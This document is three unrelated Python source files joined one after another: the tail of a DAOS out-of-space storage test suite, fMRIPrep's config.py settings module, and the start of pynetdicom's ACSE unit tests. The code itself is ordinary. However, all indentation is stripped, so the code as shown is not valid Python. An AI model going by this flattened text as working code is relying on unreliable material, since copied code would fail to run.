# Enabled TIme mode for Aggregation.
self.pool.set_property("reclaim", "time")
#Repeat the test in loop.
for _loop in range(10):
print("-------enospc_time_fg Loop--------- {}".format(_loop))
print(self.pool.pool_percentage_used())
#Run IOR to fill the pool.
self.run_enospace_with_bg_job()
#Delete all the containers
self.delete_all_containers()
#Delete container will take some time to release the space
time.sleep(60)
#Run last IO
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=1)
@skipForTicket("DAOS-8896")
def test_performance_storage_full(self):
"""Jira ID: DAOS-4756.
Test Description: Verify IO Read performance when pool size is full.
Use Case: This tests will create the pool. Run small set of IOR as
baseline.Start IOR with < 4K which will start filling SCM
and trigger aggregation and start filling up NVMe.
Check the IOR baseline read number and make sure it's +- 5%
to the number ran prior system storage was full.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_performance
"""
#Write the IOR Baseline and get the Read BW for later comparison.
print(self.pool.pool_percentage_used())
#Write First
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=1)
#Read the baseline data set
self.start_ior_load(storage='SCM', operation='Auto_Read', percent=1)
max_mib_baseline = float(self.ior_matrix[0][int(IorMetrics.Max_MiB)])
baseline_cont_uuid = self.ior_cmd.dfs_cont.value
print("IOR Baseline Read MiB {}".format(max_mib_baseline))
#Run IOR to fill the pool.
self.run_enospace_with_bg_job()
#Read the same container which was written at the beginning.
self.container.uuid = baseline_cont_uuid
self.start_ior_load(storage='SCM', operation='Auto_Read', percent=1)
max_mib_latest = float(self.ior_matrix[0][int(IorMetrics.Max_MiB)])
print("IOR Latest Read MiB {}".format(max_mib_latest))
#Check if latest IOR read performance is in Tolerance of 5%, when
#Storage space is full.
if abs(max_mib_baseline-max_mib_latest) > (max_mib_baseline/100 * 5):
self.fail('Latest IOR read performance is not under 5% Tolerance'
' Baseline Read MiB = {} and latest IOR Read MiB = {}'
.format(max_mib_baseline, max_mib_latest))
def test_enospace_no_aggregation(self):
"""Jira ID: DAOS-4756.
Test Description: IO gets DER_NOSPACE when SCM is full and it release
the size when container destroy with Aggregation
disabled.
Use Case: This tests will create the pool and disable aggregation. Fill
75% of SCM size which should work, next try fill 10% more
which should fail with DER_NOSPACE. Destroy the container
and validate the Pool SCM free size is close to full (> 95%).
Do this in loop ~10 times and verify the DER_NOSPACE and SCM
free size after container destroy.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_no_aggregation
"""
# pylint: disable=attribute-defined-outside-init
# pylint: disable=too-many-branches
print(self.pool.pool_percentage_used())
# Disable the aggregation
self.pool.set_property("reclaim", "disabled")
#Get the DER_NOSPACE and other error count from log
self.der_nospace_count, self.other_errors_count = error_count(
"-1007", self.hostlist_clients, self.client_log)
#Repeat the test in loop.
for _loop in range(10):
print("-------enospc_no_aggregation Loop--------- {}".format(_loop))
#Fill 75% of SCM pool
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=40)
print(self.pool.pool_percentage_used())
try:
#Fill 10% more to SCM ,which should Fail because no SCM space
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=40)
self.fail('This test suppose to fail because of DER_NOSPACE'
'but it got Passed')
except TestFail as _error:
self.log.info('Expected to fail because of DER_NOSPACE')
#Verify DER_NO_SAPCE error count is expected and no other Error
#in client log.
self.verify_enspace_log(self.der_nospace_count)
#Delete all the containers
self.delete_all_containers()
#Get the pool usage
pool_usage = self.pool.pool_percentage_used()
#Delay to release the SCM size.
time.sleep(60)
print(pool_usage)
#SCM pool size should be released (some still be used for system)
#Pool SCM free % should not be less than 62%
if pool_usage['scm'] > 62:
self.fail('SCM pool used percentage should be < 62, instead {}'.
format(pool_usage['scm']))
#Run last IO
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=1)
|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
r"""
A Python module to maintain unique, run-wide *fMRIPrep* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<output_dir>/sub-<participant_id>/log/<run_unique_id>/fmriprep.toml``.
Settings are stored using :abbr:`ToML (Tom's Markup Language)`.
The module has a :py:func:`~fmriprep.config.to_filename` function to allow writting out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../fmriprep/data/tests/config.toml
:language: toml
:name: fmriprep.toml
:caption: **Example file representation of fMRIPrep settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~fmriprep.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from fmriprep import config
config_file = config.execution.work_dir / '.fmriprep.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other conveniency actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Set up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
from multiprocessing import set_start_method
# Disable NiPype etelemetry always
_disable_et = bool(os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
try:
set_start_method('forkserver')
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import sys
import random
from uuid import uuid4
from pathlib import Path
from time import strftime
from nipype import logging as nlogging, __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any((
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("FMRIPREP_DEV", "0").lower() in ("1", "on", "true", "y", "yes")
)):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("FMRIPREP_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
# https://github.com/poldracklab/fmriprep/pull/2080#discussion_r409118765
from ._warnings import logging
else:
import logging
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
# Ping NiPype eTelemetry once if env var was not set
# workers on the pool will have the env variable set from the master process
if not _disable_et:
# Just get so analytics track one hit
from contextlib import suppress
from requests import get as _get_url, ConnectionError, ReadTimeout
with suppress((ConnectionError, ReadTimeout)):
_get_url("https://rig.mit.edu/et/projects/nipy/nipype", timeout=0.05)
# Execution environment
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
_exec_env = 'singularity'
_cgroup = Path('/proc/1/cgroup')
if _cgroup.exists() and 'docker' in _cgroup.read_text():
_docker_ver = os.getenv('DOCKER_VERSION_8395080871')
_exec_env = 'fmriprep-docker' if _docker_ver else 'docker'
del _cgroup
_fs_license = os.getenv('FS_LICENSE')
if not _fs_license and os.getenv('FREESURFER_HOME'):
_fs_home = os.getenv('FREESURFER_HOME')
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(os.getenv(
'TEMPLATEFLOW_HOME',
os.path.join(os.getenv('HOME'), '.cache', 'templateflow'))
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024**3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = 'n/a'
_oc_policy = 'n/a'
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path('/proc/sys/vm/overcommit_memory')
if _proc_oc_path.exists():
_oc_policy = {
'0': 'heuristic', '1': 'always', '2': 'never'
}.get(_proc_oc_path.read_text().strip(), 'unknown')
if _oc_policy != 'never':
_proc_oc_kbytes = Path('/proc/sys/vm/overcommit_kbytes')
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if _oc_limit in ('0', 'n/a') and Path('/proc/sys/vm/overcommit_ratio').exists():
_oc_limit = '{}%'.format(
Path('/proc/sys/vm/overcommit_ratio').read_text().strip()
)
except Exception:
pass
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError('Configuration type is not instantiable.')
@classmethod
def load(cls, settings, init=True):
"""Store settings from a dictionary."""
for k, v in settings.items():
if v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
continue
if hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
from niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith('_') or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *fMRIPrep* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*fMRIPrep*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = 'txt'
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = 'MultiProc'
"""NiPype's execution plugin."""
plugin_args = {
'maxtasksperchild': 1,
'raise_insufficient': False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
'plugin': cls.plugin,
'plugin_args': cls.plugin_args,
}
if cls.plugin in ('MultiProc', 'LegacyMultiProc'):
out['plugin_args']['n_procs'] = int(cls.nprocs)
if cls.memory_gb:
out['plugin_args']['memory_gb'] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config({
'monitoring': {
'enabled': cls.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config({
'execution': {
'crashdump_dir': str(execution.log_dir),
'crashfile_format': cls.crashfile_format,
'get_linked_libs': cls.get_linked_libs,
'stop_on_first_crash': cls.stop_on_first_crash,
'check_version': False, # disable future telemetry
}
})
if cls.omp_nthreads is None:
cls.omp_nthreads = min(cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
debug = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
notrack = False
"""Do not monitor *fMRIPrep* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid4())
"""Unique identifier of this particular run."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path('work').absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
'anat_derivatives',
'bids_dir',
'fs_license_file',
'fs_subjects_dir',
'layout',
'log_dir',
'output_dir',
'templateflow_home',
'work_dir',
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout
work_dir = cls.work_dir / 'bids.db'
work_dir.mkdir(exist_ok=True, parents=True)
cls._layout = BIDSLayout(
str(cls.bids_dir),
validate=False,
# database_path=str(work_dir),
ignore=("code", "stimuli", "sourcedata", "models",
"derivatives", re.compile(r'^\.')))
cls.layout = cls._layout
if cls.bids_filters:
from bids.layout import Query
# unserialize pybids Query enum values
for acq, filters in cls.bids_filters.items():
cls.bids_filters[acq] = {
k: getattr(Query, v[7:-4]) if not isinstance(v, Query) and 'Query' in v else v
for k, v in filters.items()}
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
anat_only = False
"""Execute the anatomical preprocessing only."""
aroma_err_on_warn = None
"""Cast AROMA warnings to errors."""
aroma_melodic_dim = None
"""Number of ICA components to be estimated by MELODIC
(positive = exact, negative = maximum)."""
bold2t1w_dof = None
"""Degrees of freedom of the BOLD-to-T1w registration steps."""
bold2t1w_init = 'register'
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
BOLD image-header ('header')."""
cifti_output = None
"""Generate HCP Grayordinates, accepts either ``'91k'`` (default) or ``'170k'``."""
dummy_scans = None
"""Set a number of initial scans to be considered nonsteady states."""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run FreeSurfer ``recon-all`` with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *fMRIPrep*."""
longitudinal = False
"""Run FreeSurfer ``recon-all`` with the ``-logitudinal`` flag."""
random_seed = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
medial_surface_nan = None
"""Fill medial surface with :abbr:`NaNs (not-a-number)` when sampling."""
regressors_all_comps = None
"""Return all CompCor components."""
regressors_dvars_th = None
"""Threshold for DVARS."""
regressors_fd_th = None
"""Threshold for :abbr:`FD (frame-wise displacement)`."""
run_reconall = True
"""Run FreeSurfer's surface reconstruction."""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "OASIS30ANTs"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*fMRIPrep* will run brain extraction of the T1w)."""
spaces = None
"""Keeps the :py:class:`~niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_aroma = None
"""Run ICA-:abbr:`AROMA (automatic removal of motion artifacts)`."""
use_bbr = None
"""Run boundary-based registration for BOLD-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger('cli')
"""Command-line interface logging."""
workflow = nlogging.getLogger('nipype.workflow')
"""NiPype's workflow logger."""
interface = nlogging.getLogger('nipype.interface')
"""NiPype's interface logger."""
utils = nlogging.getLogger('nipype.utils')
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(
logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt)
)
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config({
'logging': {
'log_directory': str(execution.log_dir),
'log_to_file': True
},
})
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
master = None
"""Master seed used to generate all other tracked seeds"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
@classmethod
def init(cls):
cls.master = workflow.random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ['ANTS_RANDOM_SEED'] = str(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.init()
loggers.init()
def load(filename):
"""Load settings from file."""
from toml import loads
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != 'environment':
section = getattr(sys.modules[__name__], sectionname)
section.load(configs)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
'environment': environment.get(),
'execution': execution.get(),
'workflow': workflow.get(),
'nipype': nipype.get(),
'seeds': seeds.get(),
}
if not flat:
return settings
return {'.'.join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(' ')
for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add(
Reference("MNI152NLin2009cAsym", {})
)
# Ensure user-defined spatial references for outputs are correctly parsed.
# Certain options require normalization to a space not explicitly defined by users.
# These spaces will not be included in the final outputs.
if workflow.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
spaces.add(
Reference("MNI152NLin6Asym", {"res": "2"})
)
cifti_output = workflow.cifti_output
if cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = '2' if cifti_output == '91k' else '1'
spaces.add(
Reference("fsaverage", {"den": "164k"})
)
spaces.add(
Reference("MNI152NLin6Asym", {"res": vol_res})
)
# Make the SpatialReferences object available
workflow.spaces = spaces
|
test_acse.py
|
"""Unit tests for ACSE"""
from datetime import datetime
import logging
import queue
import select
import socket
from struct import pack, unpack
import sys
import time
import threading
import pytest
from pynetdicom import (
AE,
VerificationPresentationContexts,
PYNETDICOM_IMPLEMENTATION_UID,
PYNETDICOM_IMPLEMENTATION_VERSION,
build_context,
evt,
_config,
debug_logger,
)
from pynetdicom.acse import ACSE
from pynetdicom.association import Association, ServiceUser
from pynetdicom.dimse_messages import DIMSEMessage, C_ECHO_RQ, C_ECHO_RSP
from pynetdicom.events import Event
from pynetdicom.pdu_primitives import (
A_ASSOCIATE,
A_RELEASE,
A_ABORT,
A_P_ABORT,
MaximumLengthNotification,
ImplementationClassUIDNotification,
ImplementationVersionNameNotification,
UserIdentityNegotiation,
SOPClassExtendedNegotiation,
SOPClassCommonExtendedNegotiation,
AsynchronousOperationsWindowNegotiation,
SCP_SCU_RoleSelectionNegotiation,
)
from pynetdicom.pdu import P_DATA_TF
from pynetdicom.sop_class import Verification, CTImageStorage
from pynetdicom.transport import AssociationSocket
from .encoded_pdu_items import (
a_associate_rq,
a_associate_ac,
a_release_rq,
a_release_rp,
p_data_tf,
a_abort,
a_p_abort,
)
from .parrot import ThreadedParrot, ParrotRequest
# debug_logger()
class DummyAssociationSocket:
def __init__(self):
self._ready = threading.Event()
self._ready.set()
self._is_connected = True
class DummyDUL:
def __init__(self):
self.queue = queue.Queue()
self.received = queue.Queue()
self.is_killed = False
self.socket = DummyAssociationSocket()
def send_pdu(self, primitive):
self.queue.put(primitive)
def peek_next_pdu(self):
"""Check the next PDU to be processed."""
try:
# Looks at next item without retrieving it
return self.queue.queue[0]
except (queue.Empty, IndexError):
return None
def receive_pdu(self, wait=False, timeout=None):
# Takes item off the queue
return self.queue.get(wait, timeout)
def kill_dul(self):
self.is_killed = True
class DummyAssociation:
def __init__(self):
self.ae = AE()
self.mode = None
self.dul = DummyDUL()
self.requestor = ServiceUser(self, "requestor")
self.requestor.port = 11112
self.requestor.ae_title = "TEST_LOCAL"
self.requestor.address = "127.0.0.1"
self.requestor.maximum_length = 31682
self.acceptor = ServiceUser(self, "acceptor")
self.acceptor.ae_title = "TEST_REMOTE"
self.acceptor.port = 11113
self.acceptor.address = "127.0.0.2"
self.acse_timeout = 11
self.dimse_timeout = 12
self.network_timeout = 13
self.is_killed = False
self.is_aborted = False
self.is_established = False
self.is_rejected = False
self.is_released = False
self.is_acceptor = False
self.is_requestor = True
self._handlers = {}
def abort(self):
self.is_aborted = True
self.kill()
def kill(self):
self.is_killed = True
@property
def requested_contexts(self):
return self.requestor.get_contexts("requested")
@property
def supported_contexts(self):
return self.requestor.get_contexts("supported")
def get_handlers(self, event):
if event not in self._handlers:
return []
return self._handlers[event]
class TestACSE:
"""Tests for initialising the ACSE class"""
def setup(self):
self.assoc = DummyAssociation()
self.assoc.requestor.requested_contexts = [build_context("1.2.840.10008.1.1")]
def test_default(self):
"""Test default initialisation"""
acse = ACSE(self.assoc)
assert hasattr(acse, "acse_timeout") is True
def test_is_aborted(self):
"""Test ACSE.is_aborted"""
acse = ACSE(self.assoc)
assert acse.is_aborted() is False
# "Received" A-ABORT
acse.send_abort(0x02)
assert acse.is_aborted() is True
self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert acse.is_aborted() is False
# "Received" A-P-ABORT
acse.send_ap_abort(0x02)
assert acse.is_aborted() is True
def test_is_release_requested(self):
"""Test ACSE.is_release_requested"""
acse = ACSE(self.assoc)
assert acse.is_release_requested() is False
acse.send_release()
assert acse.is_release_requested() is True
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert acse.is_release_requested() is False
acse.send_release(is_response=True)
assert acse.is_release_requested() is False
self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert acse.is_release_requested() is False
class TestNegotiationRequestor:
"""Test ACSE negotiation as requestor."""
def setup(self):
"""Run prior to each test"""
self.ae = None
self.assoc = DummyAssociation()
self.assoc.requestor.requested_contexts = [build_context("1.2.840.10008.1.1")]
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_no_requested_cx(self, caplog):
"""Test error logged if no requested contexts."""
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
assert assoc.requestor.requested_contexts == []
with caplog.at_level(logging.WARNING, logger="pynetdicom"):
assoc.acse._negotiate_as_requestor()
msg = (
"One or more requested presentation contexts must be set "
"prior to association negotiation"
)
assert msg in caplog.text
def test_receive_abort(self):
"""Test if A-ABORT received during association negotiation."""
primitive = A_ABORT()
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
assert self.assoc.is_aborted is True
assert self.assoc.dul.is_killed is True
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_ap_abort(self):
"""Test if A-P-ABORT received during association negotiation."""
primitive = A_P_ABORT()
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
assert self.assoc.is_aborted is True
assert self.assoc.dul.is_killed is True
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_other(self):
"""Test if invalid received during association negotiation."""
primitive = A_RELEASE()
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
assert self.assoc.is_aborted is False
assert self.assoc.dul.is_killed is True
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_unknown_result(self):
"""Test abort if A-ASSOCIATE result is unknown."""
primitive = A_ASSOCIATE()
primitive._result = 0xFF
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert self.assoc.is_aborted is True
assert self.assoc.is_killed is True
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ABORT)
assert primitive.abort_source == 0x02
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_reject(self):
"""Test kill if A-ASSOCIATE result is rejection."""
primitive = A_ASSOCIATE()
primitive._result = 0x01
primitive._result_source = 0x02
primitive._diagnostic = 0x01
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
assert self.assoc.is_rejected is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert self.assoc.is_aborted is False
assert self.assoc.is_rejected is True
assert self.assoc.is_established is False
assert self.assoc.dul.is_killed is True
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_accept(self):
"""Test establishment if A-ASSOCIATE result is acceptance."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established is True
assoc.release()
scp.shutdown()
class TestNegotiationAcceptor:
"""Test ACSE negotiation as acceptor."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_response_has_rejected(self):
"""Test that the A-ASSOCIATE-AC contains rejected contexts."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.add_requested_context(Verification)
ae.add_requested_context(CTImageStorage)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
pcdrl = assoc.acceptor.get_contexts("pcdrl")
cxs = {cx.context_id: cx for cx in pcdrl}
assert 3 in cxs
assert 0x03 == cxs[3].result
assoc.release()
assert assoc.is_released
scp.shutdown()
REFERENCE_REJECT_GOOD = [
(0x01, 0x01, (0x01, 0x02, 0x03, 0x07)),
(0x02, 0x01, (0x01, 0x02, 0x03, 0x07)),
(0x01, 0x02, (0x01, 0x02)),
(0x02, 0x02, (0x01, 0x02)),
(0x01, 0x03, (0x01, 0x02)),
(0x02, 0x03, (0x01, 0x02)),
]
class TestPrimitiveConstruction:
"""Test the primitive builders"""
def setup(self):
self.assoc = DummyAssociation()
